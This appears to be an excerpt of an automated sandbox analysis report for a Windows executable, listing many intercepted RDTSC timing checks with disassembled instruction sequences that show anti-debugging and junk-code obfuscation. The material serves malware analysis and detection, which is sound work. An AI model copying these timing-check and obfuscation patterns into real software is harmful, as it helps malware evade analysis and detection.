                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2BE40 second address: E2BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F10525C04h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2C119 second address: E2C121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2C121 second address: E2C12B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F10525BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2C12B second address: E2C144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9F112ED79Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2C928 second address: E2C92F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CA74 second address: E2CA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CA7A second address: E2CA80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CA80 second address: E2CA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED7A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CBE6 second address: E2CBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CD3B second address: E2CD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CD54 second address: E2CD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E242C2 second address: E242C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E242C6 second address: E242CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E242CC second address: E242D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2CFD1 second address: E2D03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFCh 0x00000009 jmp 00007F9F10525C01h 0x0000000e push edx 0x0000000f jmp 00007F9F10525C01h 0x00000014 jl 00007F9F10525BF6h 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F9F10525C02h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007F9F10525C08h 0x0000002b push ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2D716 second address: E2D735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2D9EA second address: E2D9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2D9EE second address: E2DA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F9F112ED79Eh 0x00000011 jmp 00007F9F112ED7A0h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F9F112ED7A1h 0x0000001d push esi 0x0000001e pop esi 0x0000001f jne 00007F9F112ED796h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 popad 0x00000029 pushad 0x0000002a pushad 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d push edx 0x0000002e pop edx 0x0000002f jg 00007F9F112ED796h 0x00000035 popad 0x00000036 ja 00007F9F112ED7AEh 0x0000003c jmp 00007F9F112ED7A8h 0x00000041 push eax 0x00000042 push edx 0x00000043 jnc 00007F9F112ED796h 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2DA78 second address: E2DA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAD6 second address: E2FADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FADA second address: E2FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAE0 second address: E2FAFF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F112ED7A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAFF second address: E2FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D0B second address: E33D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D11 second address: E33D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D1F second address: E33D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e je 00007F9F112ED7AFh 0x00000014 jmp 00007F9F112ED7A9h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push ecx 0x0000001f push edx 0x00000020 pop edx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E000EA second address: E00118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F9F10525BF6h 0x0000000c jmp 00007F9F10525C06h 0x00000011 popad 0x00000012 jnl 00007F9F10525BF8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E00118 second address: E0011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E373E1 second address: E373E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E373E5 second address: E373EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3750D second address: E37513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37513 second address: E37517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37517 second address: E3751D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3751D second address: E3752E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F9F112ED796h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37993 second address: E379B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F9F10525BFBh 0x0000000b jbe 00007F9F10525BF6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 jo 00007F9F10525C10h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37B31 second address: E37B38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AF4B second address: E3AF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3BBD6 second address: E3BC0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9F112ED798h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D324Ah], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3D76B second address: E3D779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F9F10525BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6C7 second address: E3E6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6CB second address: E3E6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+12479C5Bh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D21A6h], esi 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6EA second address: E3E6EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6EF second address: E3E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E43337 second address: E43342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E439AE second address: E439B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E44346 second address: E443BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F9F112ED798h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F9F112ED798h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007F9F112ED7A5h 0x00000044 push 00000000h 0x00000046 sbb esi, 6C8DE7FDh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E443BE second address: E443C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4876C second address: E48772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48772 second address: E48776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48776 second address: E4877A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49771 second address: E49775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48954 second address: E48958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49775 second address: E49779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49779 second address: E4977F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4977F second address: E497A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F9F10525C01h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A869 second address: E4A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A86D second address: E4A871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A871 second address: E4A8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9F112ED79Ch 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D31CCh], ecx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov eax, esi 0x00000018 push ecx 0x00000019 add ch, FFFFFFD3h 0x0000001c pop esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F9F112ED798h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a add ebx, 5C3C6B39h 0x00000040 xchg eax, esi 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jl 00007F9F112ED796h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4B8CF second address: E4B944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9F10525BF6h 0x00000009 jnc 00007F9F10525BF6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F9F10525BF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov bx, D6CAh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F9F10525BF8h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D362Dh], eax 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F9F10525BFFh 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4C934 second address: E4C93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4BAAE second address: E4BAB3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4CB49 second address: E4CB53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F112ED79Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E50F05 second address: E50F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F9F10525C1Eh 0x00000010 pushad 0x00000011 jmp 00007F9F10525BFDh 0x00000016 jmp 00007F9F10525C09h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F9F10525BF8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 push esi 0x00000038 sbb edi, 17BBE45Bh 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+1247C8C1h], edx 0x00000047 push 00000000h 0x00000049 jmp 00007F9F10525BFDh 0x0000004e movsx edi, cx 0x00000051 xchg eax, esi 0x00000052 je 00007F9F10525C00h 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E52064 second address: E5206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E540E2 second address: E5416C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F10525BFFh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F9F10525BF8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jmp 00007F9F10525C00h 0x0000002e push 00000000h 0x00000030 jo 00007F9F10525BFCh 0x00000036 or dword ptr [ebp+122D21AFh], edx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F9F10525BF8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 sub dword ptr [ebp+122D3001h], esi 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jg 00007F9F10525BF6h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5509F second address: E550B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F9F112ED79Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E550B3 second address: E55133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F9F10525BF8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 and bx, A42Ah 0x00000029 jmp 00007F9F10525C02h 0x0000002e push 00000000h 0x00000030 jmp 00007F9F10525BFEh 0x00000035 push ebx 0x00000036 cmc 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F9F10525BF8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov edi, dword ptr [ebp+122D1C3Ah] 0x0000005a xchg eax, esi 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f pop esi 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53265 second address: E53269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55133 second address: E55148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53269 second address: E53290 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F112ED7A9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55148 second address: E55155 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53290 second address: E53295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55155 second address: E55167 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F10525BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F9F10525BFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53295 second address: E53334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED79Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F9F112ED798h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e jne 00007F9F112ED799h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+122D1D3Dh], edi 0x00000041 mov eax, dword ptr [ebp+122D0C31h] 0x00000047 mov dword ptr [ebp+122D2936h], ecx 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F9F112ED798h 0x00000057 pop 